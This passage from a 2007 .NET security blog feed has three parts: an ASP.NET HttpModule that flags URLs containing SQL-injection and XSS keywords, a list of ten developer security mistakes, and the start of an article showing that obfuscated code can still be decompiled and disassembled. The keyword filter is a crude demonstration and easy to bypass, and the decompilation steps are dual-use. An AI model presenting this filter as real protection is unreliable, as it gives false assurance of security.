class=MsoNormal><SPAN>using</SPAN><SPAN> System.Collections.Generic;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>///</SPAN><SPAN> </SPAN><SPAN>&lt;summary&gt;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>///</SPAN><SPAN> Summary description for ICanSeeYouHttpModule<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>///</SPAN><SPAN> </SPAN><SPAN>&lt;/summary&gt;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>public</SPAN><SPAN> <SPAN>class</SPAN> <SPAN>ICanSeeYouHttpModule</SPAN> : <SPAN>IHttpModule<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN><SPAN>private</SPAN> <SPAN>List</SPAN>&lt;<SPAN>string</SPAN>&gt; suspicious = <SPAN>new</SPAN> <SPAN>List</SPAN>&lt;<SPAN>string</SPAN>&gt;();<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>public</SPAN> ICanSeeYouHttpModule()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//we fill our suspicious list with every string or character <o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//we find it not normal to use in our application web requests<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>suspicious.Add(<SPAN>"select"</SPAN>); <SPAN>//for sql injection<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>suspicious.Add(<SPAN>"update"</SPAN>);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>suspicious.Add(<SPAN>"insert"</SPAN>);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>suspicious.Add(<SPAN>"delete"</SPAN>);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>suspicious.Add(<SPAN>"drop"</SPAN>);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>suspicious.Add(<SPAN>"&lt;script"</SPAN>); <SPAN>//for xss<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>suspicious.Add(<SPAN>"'"</SPAN>); <SPAN>//for sql injection too<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>suspicious.Add(<SPAN>";"</SPAN>); <SPAN>//might be used in both xss java scripts or sql injections<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//use your imagination for the rest :)<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN><SPAN>public</SPAN> <SPAN>String</SPAN> ModuleName<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>get</SPAN> { <SPAN>return</SPAN> <SPAN>"ICanSeeYouHttpModule"</SPAN>; }<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN><SPAN>public</SPAN> <SPAN>void</SPAN> Init(<SPAN>HttpApplication</SPAN> application)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>application.BeginRequest += <SPAN>new</SPAN> <SPAN>EventHandler</SPAN>(application_BeginRequest);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN><SPAN>void</SPAN> application_BeginRequest(<SPAN>object</SPAN> sender, <SPAN>EventArgs</SPAN> e)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>HttpApplication</SPAN> application = (<SPAN>HttpApplication</SPAN>)sender;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>HttpContext</SPAN> context = application.Context;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>if</SPAN> (!Check(context.Request.RawUrl))<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>LogAndAlertTheAdmin(context.Request);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//you can also put some intimidating message here ;)<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>context.Response.Write(<SPAN>"i can see u"</SPAN>);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//or you can fake a decoy error message to <o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//let the attacker continue his scan while<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//not aware that you already know about it,<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//so you can know more about her/him and<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//her/his attack techniques<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN><SPAN>private</SPAN> <SPAN>bool</SPAN> Check(<SPAN>string</SPAN> url)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//we will check our url for the suspicious stuff<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>foreach</SPAN> (<SPAN>string</SPAN> keyword <SPAN>in</SPAN> suspicious)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>if</SPAN> (url.ToLower().Contains(keyword))<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>return</SPAN> <SPAN>false</SPAN>;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>return</SPAN> <SPAN>true</SPAN>;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN><SPAN>private</SPAN> <SPAN>void</SPAN> LogAndAlertTheAdmin(<SPAN>HttpRequest</SPAN> request)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//fill here your favorite logging method<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//you can use any available info about <o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//the attacker in the request object<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN><SPAN>public</SPAN> <SPAN>void</SPAN> Dispose()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p><FONT face=Calibri>&nbsp;</FONT></o:p></SPAN></P> <P class=MsoNormal><SPAN><FONT face=Calibri>Ofcourse the previous code is just for demonostration sake and not intended to be perfect, to use this http module for your web application all what you have to do is to add this in your configuration file under</FONT></SPAN><SPAN> <SPAN>&lt;</SPAN><SPAN>system.web</SPAN><SPAN>&gt;</SPAN><o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>&lt;</SPAN><SPAN>httpModules</SPAN><SPAN>&gt;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;</SPAN>&lt;</SPAN><SPAN>add</SPAN><SPAN> </SPAN><SPAN>name</SPAN><SPAN>=</SPAN><SPAN>"<SPAN>ICanSeeYouHttpModule</SPAN>"<SPAN> </SPAN><SPAN>type</SPAN><SPAN>=</SPAN>"<SPAN>ICanSeeYouHttpModule</SPAN>"<SPAN>/&gt;<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>&lt;/</SPAN><SPAN>httpModules</SPAN><SPAN>&gt;</SPAN><SPAN><o:p></o:p></SPAN></P> <P class=MsoNormal><o:p><FONT face=Calibri>&nbsp;</FONT></o:p></P> <P class=MsoNormal><FONT face=Calibri>Enjoy ;)</FONT></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <a href="http://www.dotnetkicks.com/kick/?url=http%3a%2f%2fbarmagy.com%2fblogs%2finfinite_loop%2farchive%2f2007%2f12%2f17%2f983.aspx"><img src="http://www.dotnetkicks.com/Services/Images/KickItImageGenerator.ashx?url=http%3a%2f%2fbarmagy.com%2fblogs%2finfinite_loop%2farchive%2f2007%2f12%2f17%2f983.aspx" border="0" alt="kick it on DotNetKicks.com" /></a><img src="http://barmagy.com/aggbug.aspx?PostID=983" width="1" height="1">Fadyhttp://barmagy.com/members/Fady.aspxhttp://barmagy.com/blogs/infinite_loop/archive/2007/11/19/880.aspx2007-11-19T21:30:00Z2007-11-19T21:30:00Zhere is a direct <A href="http://www.microsoft.com/downloads/details.aspx?FamilyId=3BF4C5CA-B905-4EBC-8901-1D4C1D1DA884&amp;displaylang=en">download link</A><img src="http://barmagy.com/aggbug.aspx?PostID=880" width="1" height="1">Fadyhttp://barmagy.com/members/Fady.aspxhttp://barmagy.com/blogs/infinite_loop/archive/2007/09/04/629.aspx2007-09-03T22:04:00Z2007-09-03T22:04:00Z<P class=MsoNormal><FONT face=Calibri>Through my humble experience with software development I’ve seen developers making fetal security mistakes without even feeling that they are doing something wrong. So I’ve decided to gather these common mistakes in a list so it would be easier to avoid. Through this article I will give examples regardless to the used technology but the concepts applies to all technologies. So here we go</FONT></P> <P class=MsoListParagraphCxSpFirst><SPAN><SPAN><FONT face=Calibri>1.</FONT><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN></SPAN></SPAN><SPAN></SPAN><FONT face=Calibri><B>Don’t hide confidential information within your code</B>: whatever you do don’t rely on hiding information within your code because as long your code is distributed to the client then the client might do with it as s/he wishes, which includes disassembling or decompiling your code and obtaining your confidential information. The kind of confidential information that you shouldn’t hide within your code might include but is not limited to passwords, user names, connections strings, IP addresses, domain names, symmetric encryption algorithms and of course <SPAN>&nbsp;</SPAN>symmetric encryption keys. </FONT><A href="/blogs/infinite_loop/archive/2007/08/12/574.aspx"><FONT face=Calibri color=#800080>And of course don’t rely on obfuscation</FONT></A><FONT face=Calibri>.</FONT></P> <P class=MsoListParagraphCxSpMiddle><SPAN><SPAN><FONT face=Calibri>2.</FONT><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN></SPAN></SPAN><SPAN></SPAN><FONT face=Calibri><B>Don’t forget to validate user input</B>: sounds obvious but most developers think that user input is only limited to the user controls like text boxes and submit buttons but that is not true. User input might include but not limited to server requests, browser cookies, query strings and post requests. If you are expecting a zip code entered by the user then the user won’t need special characters like (!@#$%^&amp;*()”’;:&lt;&gt;) so your application must not accept them. If the user will send you a request with an integer id in the query string then you don’t need negative values so your application must not accept them. SQL injection attacks and privileges escalations might happen through cookies if you don’t validate its content properly before processing it.</FONT></P> <P class=MsoListParagraphCxSpMiddle><SPAN><SPAN><FONT face=Calibri>3.</FONT><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN></SPAN></SPAN><SPAN></SPAN><FONT face=Calibri><B>Don’t validate input at the client side</B>: for example in web applications don’t validate user input using java script because the user might disable java script in his/her browser. In case of windows applications the user might be able to reverse engineer the application and reverse the validation algorithm to pass the unwanted input.</FONT></P> <P class=MsoListParagraphCxSpMiddle><SPAN><SPAN><FONT face=Calibri>4.</FONT><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN></SPAN></SPAN><SPAN></SPAN><FONT face=Calibri><B>Don’t send confidential information to the client side</B>: if you send any confidential information like network credentials to the client side then the user might be able to intercept it using any means like </FONT><A href="/blogs/infinite_loop/archive/2007/07/25/522.aspx"><FONT face=Calibri>packet sniffing</FONT></A><FONT face=Calibri> and analyze it to use it to access your resources unauthorized.</FONT></P> <P class=MsoListParagraphCxSpMiddle><SPAN><SPAN><FONT face=Calibri>5.</FONT><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN></SPAN></SPAN><SPAN></SPAN><FONT face=Calibri><B>Don’t send user confidential data on a network without encryption</B>: if you are sending your user credentials or any other critical data on any sort of network you better encrypt the whole connection so no one would be able to intercept the connection and extract the confidential information from it. For web applications SSL would be sufficient for non critical applications.</FONT></P> <P class=MsoListParagraphCxSpMiddle><SPAN><SPAN><FONT face=Calibri>6.</FONT><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN></SPAN></SPAN><SPAN></SPAN><FONT face=Calibri><B>Don’t send data to host without confirming it’s the legitimate host</B>: for example don’t authenticate on a server without confirming it’s the legitimate one because it might be just a trap to gather your users’ credentials. Basically this is easily done with the use of Active Directory as a 3<SUP>rd</SUP> party to authenticate both parties and confirm for each one that the other party is the legitimate one.</FONT></P> <P class=MsoListParagraphCxSpMiddle><SPAN><SPAN><FONT face=Calibri>7.</FONT><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN></SPAN></SPAN><SPAN></SPAN><FONT face=Calibri><B>Don’t save any confidential information at the client side</B>: if you saved user passwords on his/her machine and it got compromised then the attacker would obtain the user passwords with ease, so you should always encrypt any confidential data when saving it at the client side to avoid this from happening. </FONT></P> <P class=MsoListParagraphCxSpMiddle><SPAN><SPAN><FONT face=Calibri>8.</FONT><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN></SPAN></SPAN><SPAN></SPAN><FONT face=Calibri><B>Don’t be selfish and protect your user not only your system</B>: most developers think always that the users are always the bad guys whom are trying to penetrate and bring down the system but it’s rarely when you find developers that think of users as victims whom might get attacked with the use of there system.</FONT><A href="/blogs/infinite_loop/archive/2007/07/12/465.aspx"><FONT face=Calibri color=#800080> XSS</FONT></A><FONT face=Calibri> attacks proves this.</FONT></P> <P class=MsoListParagraphCxSpMiddle><SPAN><SPAN><FONT face=Calibri>9.</FONT><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN></SPAN></SPAN><SPAN></SPAN><FONT face=Calibri><B>Don’t be optimistic</B>: don’t remove security validations because the current part is only accessed by admins, the admin account maybe highjacked and used to control the whole system that is running your application.</FONT></P> <P class=MsoListParagraphCxSpLast><SPAN><SPAN><FONT face=Calibri>10.</FONT><SPAN>&nbsp;&nbsp; </SPAN></SPAN></SPAN><SPAN></SPAN><FONT face=Calibri><B>Be paranoid</B>: always think the worst. The more your system is critical and you want it to be secure the more you must be paranoid. Always plan for the worst, for example consider if your servers got compromised so how are you going to protect your users confidential data? What if your servers got flooded or your connections were down? What if your users got hacked and there credentials were stolen? What if your network was penetrated and what if your traffic was filtered? You must always ask your self the worst questions while designing the security schemes of your application.</FONT></P> <P class=MsoNormal><FONT face=Calibri>Thanks for reading and I wish you have enjoyed this article. I would like to hear your opinions so your comments and feedbacks would be really appreciated.</FONT></P> <a href="http://www.dotnetkicks.com/kick/?url=http://barmagy.com/blogs/infinite_loop/archive/2007/09/04/629.aspx"><img src="http://www.dotnetkicks.com/Services/Images/KickItImageGenerator.ashx?url=http://barmagy.com/blogs/infinite_loop/archive/2007/09/04/629.aspx" border="0" alt="kick it on DotNetKicks.com" /></a><img src="http://barmagy.com/aggbug.aspx?PostID=629" width="1" height="1">Fadyhttp://barmagy.com/members/Fady.aspxhttp://barmagy.com/blogs/infinite_loop/archive/2007/08/12/574.aspx2007-08-11T21:24:00Z2007-08-11T21:24:00Z<P class=MsoNormal><FONT face=Calibri>Managed code unlike native code have been known to be easily decompiled to it’s source code easing its reverse engineering thus giving the need to what we call obfuscation to change the managed code after compiling it in a way that makes decompilers obsolete and makes decompiling it useless as the decompilation will generate garbage code that can’t be understood or compiled again after modifying it. Obfuscation is mostly done with renaming the names of classes, methods and variables into random names rendering it unreadable when it’s decompiled and in the case of some obfuscators the output obfuscated application when decompiled generate a code that gives build errors when being compiled again. But although obfuscation sometimes proves to be efficient, it has major weakness and limitations that makes relying on it is not a good decision. </FONT></P> <P class=MsoNormal><FONT face=Calibri>For the sake of demonstration in this article I’m going to use C# .net as my managed code and preemptive dotfuscator that comes as a community edition with Microsoft Visual Studio will be my obfuscation tool.</FONT></P> <P class=MsoNormal><FONT face=Calibri>Say that we have this application that checks if the user is authenticated or not before doing an action</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp; </SPAN>private void btnSubmit_Click(object sender, EventArgs e)</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>&nbsp;&nbsp;</SPAN>{</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>//we authenticate the user here using the method Authenticate()</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>if (Authenticate())</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>//if the user credential is valid then...</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>MessageBox.Show("access granted");</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>this.Run();</FONT></P> <P class=MsoNormal><SPAN><FONT face=Calibri>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </FONT></SPAN></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>else</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>//else we kick him/her out</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>MessageBox.Show("invalid credentials");</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>this.Close();</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}</FONT></P> <P class=MsoNormal><FONT face=Calibri>So when we obfuscate this code and try to decompile it we get (I use </FONT><A href="http://www.aisto.com/roeder/dotnet/"><FONT face=Calibri color=#800080>Lutz reflector</FONT></A><FONT face=Calibri> to do the decompile)</FONT></P> <P class=MsoNormal><FONT face=Calibri>private void a(object A_0, EventArgs A_1)</FONT></P> <P class=MsoNormal><FONT face=Calibri>{</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>if (this.c())</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>MessageBox.Show("access granted");</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>this.b();</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>else</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>MessageBox.Show("invalid credentials");</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>base.Close();</FONT></P> <P class=MsoNormal><FONT face=Calibri><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}</FONT></P> <P class=MsoNormal><FONT face=Calibri>}</FONT></P> <P class=MsoNormal><o:p><FONT face=Calibri>&nbsp;</FONT></o:p></P> <P class=MsoNormal><FONT face=Calibri>As it’s obvious most of the code have been renamed but the messages strings are untouched also the .net framework used classes and methods like MessageBox class and Show() method still not renamed which is a big problem, compiling the resulting code from decompiling obfuscated code might result build time errors because the obfuscated code might have the same names for methods and classes but this isn’t the same for IL (intermediate language) so if we simply used ildasm to disassemble the exe assembly for this application we will get this</FONT></P> <P class=MsoNormal><o:p><FONT face=Calibri>&nbsp;</FONT></o:p></P> <P class=MsoNormal><FONT face=Calibri>C:\Program Files\Microsoft Visual Studio 8\VC&gt;ildasm C:\Dotfuscated\password.exe /out=c:\password.il</FONT></P> <P class=MsoNormal><o:p><FONT face=Calibri>&nbsp;</FONT></o:p></P> <P class=MsoNormal><SPAN>.method private hidebysig instance void <o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>a(object A_0,<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>class [mscorlib]System.EventArgs A_1) cil managed<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P 